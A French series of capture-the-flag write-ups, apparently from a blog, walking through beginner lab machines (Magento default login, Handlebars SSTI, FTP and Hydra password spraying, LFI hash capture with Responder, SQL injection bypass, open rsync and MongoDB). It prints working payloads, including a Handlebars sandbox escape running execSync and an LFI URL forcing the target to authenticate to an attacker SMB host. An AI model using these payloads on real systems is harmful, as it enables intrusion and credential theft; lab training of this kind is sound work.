▶ RavenBreach sur YouTube

Reconnaissance​

Découverte d'hôte​

┌──(kali㉿kali)-[~]
└─$ ping 10.129.1.27

64 bytes from 10.129.1.27: icmp_seq=1 ttl=63 time=11.5 ms

Machine Linux.

Énumération des services​

┌──(kali㉿kali)-[~]
└─$ nmap -p80 -sV -sC 10.129.1.27

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.2
|_http-title: Did not follow redirect to http://ignition.htb/

Le scan révèle une redirection vers http://ignition.htb/ — Name-Based Virtual Hosting.

Configuration DNS locale​

sudo nano /etc/hosts
# Ajouter : 10.129.1.27 ignition.htb

En accédant à http://ignition.htb :

L'analyse avec Wappalyzer révèle un CMS Magento (PHP, JavaScript, MySQL).

Pré-Exploitation​

Enumération des répertoires avec Gobuster​

La page d'accueil ne présente rien d'exploitable. On tente des injections XSS/SQL mais les entrées sont validées. On passe à l'énumération.

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -w /usr/share/wordlists/common.txt -u http://ignition.htb

/admin  (Status: 200) [Size: 7092]

La route /admin est accessible (code 200) !

Découverte du panneau d'administration​

En naviguant vers http://ignition.htb/admin :

Formulaire de connexion Magento Admin.

Exploitation​

Recherche d'identifiants valides​

Il n'existe pas d'identifiants par défaut universels pour Magento. La documentation Adobe pour Magento précise que la politique de mots de passe impose un minimum de 7 caractères avec un mélange de lettres et chiffres.

La machine date de 2021. En croisant cette contrainte avec les listes de mots de passe les plus courants de 2021, on tente admin / qwerty123.

La connexion réussit !

Le flag est affiché directement sur le dashboard.

La machine est pwned !

Conclusion​

Chaîne d'attaque :

1. Reconnaissance → nginx avec redirection vers ignition.htb, ajout /etc/hosts
2. Fingerprinting → détection de Magento via Wappalyzer
3. Enumération → route /admin trouvée avec Gobuster
4. Exploitation → connexion admin / qwerty123, mot de passe commun respectant la politique Magento 2021

On va identifier que l'application tourne sur Node.js avec Express et le moteur de templates Handlebars, puis exploiter une injection pour contourner la sandbox et exécuter des commandes système arbitraires.

▶ RavenBreach sur YouTube

Reconnaissance​

Configuration DNS locale​

sudo nano /etc/hosts
# Ajouter : 10.129.29.247 bike.htb

On vérifie avec un ping bike.htb — TTL de 63 → machine Linux.

Énumération des services​

┌─[user@parrot]─[~]
└──╼ $nmap -p22,80 -sV -sC bike.htb

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu
80/tcp open  http    Node.js (Express middleware)
|_http-title:  Bike

Le port 80 tourne sur Node.js avec le framework Express.

Exploration de l'application web​

En ouvrant http://bike.htb, on découvre un site avec un formulaire d'inscription à une newsletter.

On soumet une valeur quelconque et l'application renvoie notre saisie directement dans la page.

Ce comportement est typique d'un moteur de templates affichant dynamiquement des données utilisateur. Ça sent la SSTI.

Pré-Exploitation​

Identification de la vulnérabilité SSTI​

On soumet {{7*7}} dans le formulaire.

On n'obtient pas 49 mais une erreur. Le serveur a tenté d'évaluer l'expression — la syntaxe {{ }} est reconnue. Le message d'erreur révèle le chemin /routes/Backend/ et le nom du moteur : Handlebars.

Mise en place de BurpSuite​

On ouvre BurpSuite, on crée un projet temporaire, on active l'intercept et on ouvre le navigateur intégré.

Exploitation​

Payload SSTI Handlebars​

En cherchant sur HackTricks les payloads pour Handlebars, on utilise la syntaxe de blocks pour remonter au constructeur JavaScript et appeler require('child_process').exec().

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').exec('whoami');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

On encode ce payload en URL encode dans l'onglet Decoder de BurpSuite.

On intercepte une requête et on l'envoie au Repeater.

Dans le Repeater, on remplace la valeur du paramètre email par notre payload encodé.

La réponse renvoie require is not defined.

Le code s'exécute dans une sandbox qui bloque l'accès à require.

Contournement de la sandbox avec process​

Dans Node.js, process est un objet global accessible partout. process.mainModule fait référence au module principal, non sandboxé.

On modifie le payload progressivement :

{{this.push "return process;"}}

La réponse contient [object process] — on peut accéder à process.

Exécution de commandes​

{{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}

On a une RCE !

Post-Exploitation​

Récupération du flag​

{{this.push "return process.mainModule.require('child_process').execSync('ls /root');"}}

Un fichier flag.txt est présent.

{{this.push "return process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}

6b2{...}81c

La machine est pwned !

Conclusion​

Chaîne d'attaque :

1. Reconnaissance → Node.js / Express sur port 80
2. Détection SSTI → {{7*7}} révèle Handlebars via l'erreur
3. Exploitation initiale → payload bloqué par la sandbox qui interdit require
4. Contournement → process.mainModule.require pour sortir de la sandbox
5. RCE → execSync + lecture de /root/flag.txt

▶ RavenBreach sur YouTube

Reconnaissance​

Découverte d'hôte​

┌─[ravenbreach@htb]─[~]
└──╼ $ ping 10.129.228.195

64 bytes from 10.129.228.195: icmp_seq=1 ttl=63 time=7.60 ms

TTL de 63 → machine Linux.

Énumération des services​

┌─[ravenbreach@htb]─[~]
└──╼ $ nmap -sV 10.129.228.195

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu

Scan approfondi​

┌─[ravenbreach@htb]─[~]
└──╼ $ nmap -p21,22 -sC -sV 10.129.228.195

21/tcp open  ftp  vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp  ftp  4096 Nov 28  2022 mail_backup

Connexion FTP anonyme autorisée avec un dossier mail_backup visible !

Pré-Exploitation​

Connexion FTP anonyme et récupération des fichiers​

┌─[ravenbreach@htb]─[~]
└──╼ $ ftp 10.129.228.195

Name: anonymous
230 Login successful.
ftp> cd mail_backup
ftp> dir

-rw-r--r--  password_policy.pdf
-rw-r--r--  welcome_28112022

On récupère les deux fichiers avec get.

Analyse des fichiers​

┌─[ravenbreach@htb]─[~]
└──╼ $ cat welcome_28112022

From: root@funnel.htb
To: optimus@funnel.htb albert@funnel.htb andreas@funnel.htb christine@funnel.htb maria@funnel.htb

Hello everyone,
We have set up your accounts. Please, read through the attached password policy.

On découvre :

• Nom de domaine : funnel.htb
• Liste d'utilisateurs : optimus, albert, andreas, christine, maria
• Le PDF joint contient les identifiants

Le fichier password_policy.pdf révèle le mot de passe par défaut : funnel123#!#.

Exploitation​

Bruteforce SSH avec Hydra​

┌─[ravenbreach@htb]─[~]
└──╼ $ cat usernames.txt
root
optimus
albert
andreas
christine
maria

┌─[ravenbreach@htb]─[~]
└──╼ $ hydra -L usernames.txt -p 'funnel123#!#' 10.129.228.195 ssh

[22][ssh] host: 10.129.228.195   login: christine   password: funnel123#!#

Christine n'a pas changé son mot de passe par défaut.

Connexion SSH et énumération interne​

┌─[ravenbreach@htb]─[~]
└──╼ $ ssh christine@10.129.228.195

christine@funnel:~$

On cherche les services en écoute sur localhost :

christine@funnel:~$ ss -tl

LISTEN  0  4096  127.0.0.1:postgresql  0.0.0.0:*
LISTEN  0  32    *:ftp                 *:*

Une base de données PostgreSQL tourne en local — mais psql n'est pas installé sur la machine et on ne peut pas l'accéder depuis l'extérieur.

Port Forwarding SSH​

On crée un tunnel SSH : le port local 1234 redirige vers le port 5432 (PostgreSQL) de la machine distante.

┌─[ravenbreach@htb]─[~]
└──╼ $ ssh -L 1234:localhost:5432 christine@10.129.228.195

On vérifie que le tunnel est actif :

┌─[ravenbreach@htb]─[~]
└──╼ $ ss -tlnp

LISTEN  0  128  127.0.0.1:1234  users:(("ssh",pid=157558))

Connexion à PostgreSQL via le tunnel​

sudo apt install postgresql-client

┌─[ravenbreach@htb]─[~]
└──╼ $ psql -U christine -h localhost -p 1234

Password for user christine: funnel123#!#
christine=#

Post-Exploitation​

Exploration de la base de données​

christine=# \l

    Name   |  Owner
-----------+-----------
 secrets   | christine

christine=# \connect secrets
secrets=# \dt

 Schema | Name | Type  |   Owner
--------+------+-------+-----------
 public | flag | table | christine

secrets=# SELECT * FROM flag;

              value
----------------------------------
 cf2{...}db1

La machine est pwned !

Conclusion​

Chaîne d'exploitation :

1. FTP anonyme → mail de bienvenue + PDF avec mot de passe par défaut
2. Password spray Hydra → connexion SSH via christine
3. Énumération interne → PostgreSQL sur localhost:5432
4. Port Forwarding SSH → tunnel local:1234 → distant:5432
5. PostgreSQL → flag dans la base secrets

Chaîne d'exploitation : vulnérabilité web → piège SMB avec Responder → hash NetNTLMv2 → craquage John the Ripper → accès WinRM via Evil-WinRM.

▶ RavenBreach sur YouTube

Reconnaissance​

Découverte d'hôte​

┌─[user@parrot]─[~]
└──╼ $ping 10.129.13.44

64 bytes from 10.129.13.44: icmp_seq=1 ttl=127 time=62.0 ms

Le TTL de 127 indique une machine Windows.

Énumération des services​

┌─[user@parrot]─[~]
└──╼ $nmap -sV 10.129.13.44

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)

Scan complet (tous les ports)​

┌─[ravenbreach@htb]─[~]
└──╼ $ nmap -p- --min-rate 1000 -sV 10.129.27.4

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Le port 5985 : c'est WinRM (Windows Remote Management). Utile plus tard si on obtient des credentials.

Pré-Exploitation​

Exploration de l'application web​

En accédant à l'IP via un navigateur, on a une erreur de redirection vers unika.htb — Name-Based Virtual Hosting.

On ajoute l'entrée dans /etc/hosts :

sudo nano /etc/hosts
# Ajouter : 10.129.27.4 unika.htb

Maintenant http://unika.htb charge le site.

Identification de la vulnérabilité LFI​

Le site propose de changer la langue. En sélectionnant le français, l'URL contient un paramètre page qui charge directement un fichier :

Ce paramètre non sécurisé est vulnérable à une LFI.

Transformation LFI → RFI via SMB​

Au lieu de lire des fichiers locaux, on va exploiter cette LFI pour forcer le serveur Windows à se connecter à notre propre serveur SMB. Quand Windows essaiera de se connecter, il enverra automatiquement son hash NetNTLMv2 — qu'on intercepte avec Responder.

Exploitation​

Configuration de Responder​

┌─[ravenbreach@htb]─[~]
└──╼ $ sudo responder -I tun0

[+] Servers: HTTP ON, SMB ON, ...
[+] Listening for events...

Déclenchement de l'attaque​

On note notre IP (ifconfig tun0) :

On forge l'URL pour pointer vers notre serveur SMB :

http://unika.htb/index.php?page=//10.10.14.86/share/textLFI.txt

Interception du hash NetNTLMv2​

On copie le hash dans un fichier :

echo "Administrator::RESPONDER:...[hash complet]..." > hashUnika.txt

Craquage avec John The Ripper​

┌─[ravenbreach@htb]─[~]
└──╼ $ john -w=/usr/share/wordlists/rockyou.txt hashUnika.txt

badminton        (Administrator)
Session completed.

Le mot de passe est badminton.

Post-Exploitation​

Connexion via WinRM (Evil-WinRM)​

┌─[ravenbreach@htb]─[~]
└──╼ $ evil-winrm -i 10.129.27.62 -u administrator -p badminton

*Evil-WinRM* PS C:\Users\Administrator\Documents>
whoami
responder\administrator

Récupération du flag​

*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt

ea8{...}fac

La machine est pwned !

▶ RavenBreach sur YouTube

Reconnaissance​

Scan NMAP​

sudo nmap -sV -sC 10.129.1.15

Le scan révèle deux ports ouverts :

• 21 (FTP) : vsftpd 3.0.3 — avec ftp-anon: Anonymous FTP login allowed
• 80 (HTTP) : Apache httpd 2.4.41

Les scripts nmap signalent immédiatement : deux fichiers intéressants sont accessibles : allowed.userlist et allowed.userlist.passwd.

Récupération des fichiers FTP​

ftp 10.129.1.15

Login : anonymous, mot de passe vide.

230 Login successful.

On récupère les deux fichiers avec get.

Analyse des fichiers​

On y trouve une liste d'utilisateurs (admin, aron, pwnmeow, etc.) et une liste de mots de passe. C'est une mine d'or !

Analyse de la page web​

En naviguant vers l'IP sur le port 80 :

L'extension Wappalyzer indique une stack PHP. On cherche une page de connexion.

Fuzzing des répertoires avec Gobuster​

gobuster dir --url http://10.129.1.15/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html

Gobuster trouve login.php.

Exploitation​

En navigant vers http://10.129.1.15/login.php :

On essaie le compte admin avec le premier mot de passe de la liste.

La connexion fonctionne ! Le flag est affiché sur le tableau de bord.

La machine est pwned !

▶ RavenBreach sur YouTube

Reconaissance​

On commence par notre rituel habituel, le scan Nmap. On veut savoir ce qui tourne et dans quelle version.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 10.129.33.220

Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-19 07:39 -0500
Nmap scan report for 10.129.33.220
Host is up (0.015s latency).
Not shown: 999 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 65
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, Speaks41ProtocolOld, ConnectWithDatabase, Speaks41ProtocolNew, SupportsTransactions, InteractiveClient, IgnoreSpaceBeforeParenthesis, SupportsCompression, IgnoreSigpipes, FoundRows, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: V_X{%?QYLN%ic7%ST.%l
|_  Auth Plugin Name: mysql_native_password

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.96 seconds

• -sC : Lance les scripts de détection par défaut (très utile pour voir si un service accepte les connexions anonymes).
• -sV : Détecte la version exacte du service.

Résultat du scan, On ne trouve qu'un seul port ouvert : le 3306. Le service est MariaDB (version 5.5.5–10.3.27-MariaDB-0+deb10u1).

Pré-Exploitation​

Installation du client​

Pour pouvoir parler à la cible, il nous faut l'outil approprié sur notre machine locale. Si vous ne l'avez pas, installez le client MySQL (qui fonctionne avec mariaDB).

┌─[user@htb]─[~]
└──╼ [★]$ sudo apt update && sudo apt install mysql*

Le test de la "porte ouverte"​

En sécurité, avant de sortir les outils compliqués, on teste toujours la base. MariaDB utilise normalement un combo utilisateur / mot de passe. Mais est-ce que le compte root (celui qui a tous les droits) est protégé ?

┌──(kali㉿kali)-[~]
└─$ mysql -h  10.129.33.220 -u root

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 77
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

• -h : L'adresse IP de la cible.
• -u root : On tente de se connecter en tant qu'administrateur.

La connexion est acceptée immédiatement sans demander de mot de passe. On est dans le terminal MariaDB !

Exploitation​

Maintenant qu'on est à l'intérieur, il faut savoir naviguer. Le langage SQL utilise des commandes très spécifiques. Voici notre feuille de route :

1. Lister les bases de données​

On veut voir quels sont les "classeurs" disponibles sur ce serveur.

MariaDB [(none)]> SHOW databases;

+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.017 sec)

On repère une base nommée htb. C'est clairement notre cible.

2. Entrer dans la base​

C'est l'équivalent d'un cd dans un terminal.

MariaDB [(none)]> USE htb;

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]>

3. Lister les tables​

Une base de données contient des tables (comme des feuilles Excel). Voyons ce qu'il y a dans htb.

MariaDB [htb]> SHOW tables;

+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.012 sec)

Le serveur nous renvoie deux tables : config et users

4. Extraire les données​

C'est le moment de vérité. On va demander d'afficher tout le contenu de la table config pour voir si le flag s'y cache.

MariaDB [htb]> SELECT * FROM config;

+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4{...}da8                      |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.012 sec)

Et boum ! Le terminal nous affiche une ligne avec notre précieux flag : 7b4{…}da8

La machine est pwned !

▶ RavenBreach sur YouTube

Reconnaissance​

Découverte d'hôte​

┌─[ravenbreach@htb]─[~]
└──╼ $ ping 10.129.8.127

64 bytes from 10.129.8.127: icmp_seq=1 ttl=63 time=8.33 ms

Énumération des services​

┌─[ravenbreach@htb]─[~]
└──╼ $ nmap -sC -sV 10.129.8.127

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Login

Le seul port ouvert est le 80. La page par défaut est une page de Login.

Analyse et Pré-Exploitation​

Le mur du Login​

En arrivant sur http://10.129.8.127, on tombe sur un formulaire classique.

On tente d'abord les identifiants par défaut (admin:admin, root:root, etc.) — rien ne fonctionne. Il est temps de passer à l'offensive logique.

Exploitation​

La faille : Injection SQL​

L'application est probablement codée en PHP et utilise une base de données SQL pour vérifier les identifiants. Hypothèse de la requête SQL :

SELECT * FROM users WHERE username = '$username' AND password = '$password';

Si le développeur n'a pas "nettoyé" les inputs, on peut manipuler la requête.

Le payload​

On utilise l'apostrophe ' qui, en SQL, délimite les chaînes de caractères. Si on en ajoute une, on "casse" la structure de la commande.

Dans le champ Username, on entre :

admin'#

La requête SQL devient :

SELECT * FROM users WHERE username = 'admin'#' AND password = 'a';

• admin' : on ferme la chaîne de caractère
• # : symbole de commentaire en SQL — tout ce qui suit est ignoré, y compris la vérification du mot de passe

Execution​

• Rendez-vous sur la page de login
• Username : admin'#
• Password : n'importe quoi (ex: a)
• Appuyez sur Login

La session s'ouvre ! La machine est pwned !

Post-Exploitation​

Cette machine illustre la vulnérabilité SQL Injection (SQLi). C'est une erreur critique car elle permet de contourner totalement l'authentification sans même connaître le mot de passe.

Protection : en tant que développeur, utiliser des requêtes préparées (Prepared Statements). Le serveur sait alors faire la différence entre une commande SQL et une donnée envoyée par l'utilisateur.

Cette machine illustre parfaitement comment un outil de sauvegarde, s'il est mal configuré, peut devenir une porte ouverte sur vos données.

▶ RavenBreach sur YouTube

Reconnaissance​

Découverte d'hôte​

┌─[ravenbreach@htb]─[~]
└──╼ $ ping 10.129.8.119

64 bytes from 10.129.8.119: icmp_seq=1 ttl=63 time=8.33 ms

Énumération des services​

┌─[ravenbreach@htb]─[~]
└──╼ $ nmap -sV 10.129.8.119

PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)

Port 873 ouvert. Le service est rsync — un outil de synchronisation et transfert de fichiers massivement utilisé pour les backups de serveurs. Il ne transfère que les parties modifiées des fichiers (système de "delta").

Pré-Exploitation​

Evaluation de vulnérabilité​

Parfois, rsync est configuré pour accepter des connexions anonymes. On liste les répertoires disponibles.

┌─[ravenbreach@htb]─[~]
└──╼ $ rsync --list-only 10.129.8.119::

public          Anonymous Share

Un partage public en accès anonyme !

Exploitation​

Exploration du dossier​

┌─[ravenbreach@htb]─[~]
└──╼ $ rsync --list-only 10.129.8.119::public

-rw-r--r--  33  2022/10/24  flag.txt

Récupération du flag​

┌─[ravenbreach@htb]─[~]
└──╼ $ rsync 10.129.8.119::public/flag.txt flag.txt

┌─[ravenbreach@htb]─[~]
└──╼ $ cat flag.txt

72e{...}519

La machine est pwned !

Post-Exploitation​

La faille résidait dans /etc/rsyncd.conf. En autorisant l'accès sans authentification à un module, l'administrateur a transformé son outil de sauvegarde en serveur de fichiers public.

Leçon : ne jamais exposer rsync sans authentification (auth users) et restreindre l'accès par IP pour que seuls les serveurs de backup autorisés puissent se connecter.

Le scénario est un grand classique du "fail" en sysadmin, une base de données ultra-performante, mais dont la porte a été laissée grande ouverte sans aucun verrou (authentification).

▶ RavenBreach sur YouTube

Reconnaissance​

Découverte d'hôte​

On commence par vérifier la connectivité avec un ping.

┌─[user@parrot]─[~]
└──╼ $ping 10.129.228.30

PING 10.129.228.30 (10.129.228.30) 56(84) bytes of data.
64 bytes from 10.129.228.30: icmp_seq=1 ttl=63 time=59.3 ms
64 bytes from 10.129.228.30: icmp_seq=2 ttl=63 time=81.8 ms
64 bytes from 10.129.228.30: icmp_seq=3 ttl=63 time=72.2 ms
^C
--- 10.129.228.30 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2006ms
rtt min/avg/max/mdev = 59.309/71.118/81.816/9.222 ms

Ça répond. On peut passer à l'étape suivante.

Service enumération​

Lançons un scan nmap classique pour voir ce qui est exposé.

┌─[user@parrot]─[~]
└──╼ $nmap -sV 10.129.228.30

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-12 13:10 UTC
Nmap scan report for 10.129.228.30
Host is up (0.053s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect res

Seulement du SSH ? C'est louche. Sur ces machines de niveau débutant, le SSH est rarement le point d'entrée. On va donc forcer avec un scan beaucoup plus agressif sur tous les ports (-p-) en boostant la vitesse (--min-rate).

┌─[user@parrot]─[~]
└──╼ $nmap -p- --min-rate=100 -sV 10.129.228.30

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-12 13:13 UTC
Nmap scan report for 10.129.228.30
Host is up (0.047s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open  mongod?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port27017-TCP:V=7.94SVN%I=7%D=12/12%Time=693C15AD%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,A9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nCon
SF:tent-Type:\x20text/plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x2
SF:0like\x20you\x20are\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTT
SF:P\x20on\x20the\x20native\x20driver\x20port\.\r\n")%r(FourOhFourRequest,
SF:A9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-Type:\x20
SF:text/plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like\x20you\x
SF:20are\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20on\x20the
SF:\x20native\x20driver\x20port\.\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 226.27 seconds

Pré-Exploitation​

Installation des outils​

Pour parler à MongoDB, il nous faut le client officiel : mongosh.

Donc on télécharge mongosh 2.3.2

┌─[user@parrot]─[~]
└──╼ $curl -O https://downloads.mongodb.com/compass/mongosh-2.3.2-linux-x64.tgz

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 78.4M  100 78.4M    0     0  21.7M      0  0:00:03  0:00:03 --:--:-- 21.7M

Ensuite on le décompresse

┌─[user@parrot]─[~]
└──╼ $tar xvf mongosh-2.3.2-linux-x64.tgz

mongosh-2.3.2-linux-x64/
mongosh-2.3.2-linux-x64/.sbom.json
mongosh-2.3.2-linux-x64/LICENSE-crypt-library
mongosh-2.3.2-linux-x64/LICENSE-mongosh
mongosh-2.3.2-linux-x64/README
mongosh-2.3.2-linux-x64/THIRD_PARTY_NOTICES
mongosh-2.3.2-linux-x64/bin/
mongosh-2.3.2-linux-x64/mongosh.1.gz
mongosh-2.3.2-linux-x64/bin/mongosh

Exploitation​

Connexion à la base de données​

Maintenant allons a l'endroit ou est l'utilitaire et tentons une connexion.

┌─[user@parrot]─[~]
└──╼ $cd mongosh-2.3.2-linux-x64/bin

┌─[✗]─[user@parrot]─[~/mongosh-2.3.2-linux-x64/bin]
└──╼ $./mongosh mongodb://10.129.228.30:27017

Current Mongosh Log ID: 693c1dd99e268f09ebfe6910
Connecting to:  mongodb://10.129.228.30:27017/?directConnection=true&appName=mongosh+2.3.2
Using MongoDB:  3.6.8
Using Mongosh:  2.3.2
mongosh 2.5.10 is available for download: https://www.mongodb.com/try/download/shell

For mongosh info see: https://www.mongodb.com/docs/mongodb-shell/


To help improve our products, anonymous usage data is collected and sent to MongoDB periodically (https://www.mongodb.com/legal/privacy-policy).
You can opt-out by running the disableTelemetry() command.

------
   The server generated these startup warnings when booting
   2025-12-12T13:04:47.332+0000: 
   2025-12-12T13:04:47.332+0000: ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
   2025-12-12T13:04:47.332+0000: **          See http://dochub.mongodb.org/core/prodnotes-filesystem
   2025-12-12T13:04:48.771+0000: 
   2025-12-12T13:04:48.771+0000: ** WARNING: Access control is not enabled for the database.
   2025-12-12T13:04:48.771+0000: **          Read and write access to data and configuration is unrestricted.
   2025-12-12T13:04:48.771+0000:
------

test> 

Une fois dedans, on reçoit un avertissement qui devrait faire trembler n'importe quel admin : WARNING: Access control is not enabled for the database. Cela signifie que nous avons les pleins pouvoirs (Lecture/Écriture) sans mot de passe.

Fouille des données​

C'est le moment de jouer avec les commandes MongoDB. On commence par lister les bases disponibles avec show dbs.

test> show dbs

admin                   32.00 KiB
config                 108.00 KiB
local                   72.00 KiB
sensitive_information   32.00 KiB
users                   32.00 KiB

La base sensitive_information porte un nom beaucoup trop tentant. Selectionnons la avec la commande use suivi du nom de la db

test> use sensitive_information

switched to db sensitive_informatio

Ensuite, on affiche les collections (l'équivalent des tables dans une base SQL) avec la commande show collections

sensitive_information> show collections

flag

Il ne reste plus qu'à lire le contenu de la collection flag avec la fonction .find():

sensitive_information> db.flag.find()

[
  {
    _id: ObjectId('630e3dbcb82540ebbd1748c5'),
    flag: '1b6{...}6ea'
  }
]

Et voilà ! Le flag est extrait avec succès.

Post-Exploitation​

Qu'est-ce qui s'est passé ici ? MongoDB, dans ses anciennes configurations ou via une mauvaise installation, ne limite pas l'accès aux interfaces réseaux. Si l'administrateur n'active pas le RBAC (Role-Based Access Control), le serveur accepte n'importe quelle connexion entrante.

Leçon du jour : Une base de données ne doit JAMAIS être exposée sur le réseau public sans une authentification robuste et, idéalement, un accès limité par IP (Whitelist).

La machine est pwned !

Vidéo Walkthrough​

Reconnaissance​

Découverte d'hôte​

┌─[user@parrot]─[~]
└──╼ $ping 10.129.7.118

64 bytes from 10.129.7.118: icmp_seq=3 ttl=63 time=13.4 ms

Énumération des services​

┌─[user@parrot]─[~]
└──╼ $nmap -sV 10.129.7.118

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.2

Un seul port ouvert : le 80. Serveur web nginx 1.14.2. En navigant vers l'IP, on tombe sur la page par défaut "Welcome to nginx".

Pré-Exploitation​

Énumération de répertoires avec Gobuster​

Puisque la page d'accueil ne montre rien, on cherche des dossiers ou fichiers cachés avec Gobuster.

┌─[user@parrot]─[~]
└──╼ $sudo gobuster dir -w /usr/share/wordlists/common.txt -u 10.129.7.118

/admin.php  (Status: 200) [Size: 999]

Gobuster trouve /admin.php (Status 200 = accessible) !

Exploitation​

Accès initial​

On se rend sur http://10.129.7.118/admin.php — un formulaire de connexion.

Comme le serveur semble être une installation fraîche, on tente les identifiants par défaut :

• Username : admin
• Password : admin

Ça fonctionne ! On est connecté.

Récupération du flag​

Une fois connecté sur l'interface d'administration, le flag est affiché directement.

La machine est pwned !

Post-Exploitation​

Deux vulnérabilités illustrées ici :

• Pages d'administration exposées : ne jamais laisser accessible sans protection supplémentaire
• Identifiants par défaut : toujours les changer dès l'installation d'un service

Vidéo Walkthrough​

Reconnaissance​

Découverte d'hôte​

┌─[user@parrot]─[~]
└──╼ $ping 10.129.7.131

64 bytes from 10.129.7.131: icmp_seq=1 ttl=127 time=16.1 ms

Le TTL de 127 confirme une machine Windows.

Énumération des services​

┌─[user@parrot]─[~]
└──╼ $sudo nmap -sV 10.129.7.131

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services

Le port 3389 correspond au service RDP (Remote Desktop Protocol). Cela permet d'accéder à l'interface graphique d'un serveur à distance.

Pré-Exploitation​

Evaluation de vulnérabilité​

Sur Windows, le compte roi est l'Administrator. Parfois, les administrateurs oublient de mettre un mot de passe ou désactivent l'authentification pour des tests.

On utilise xfreerdp3 avec l'option /v: pour l'IP.

┌─[user@parrot]─[~]
└──╼ $xfreerdp3 /v:10.129.7.131

[INFO] - No user name set. - Using login name: user
[ERROR] - ERRCONNECT_PASSWORD_CERTAINLY_EXPIRED

Le programme utilise notre nom d'utilisateur local — ça ne marche pas.

Exploitation​

Accès initial (RDP Login)​

On force l'utilisateur Administrator et on ignore les certificats auto-signés.

┌─[user@parrot]─[~]
└──╼ $xfreerdp3 /v:10.129.7.131 /cert:ignore /u:Administrator

Domain:
Password:
[INFO] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]

• /v: : L'IP de la cible
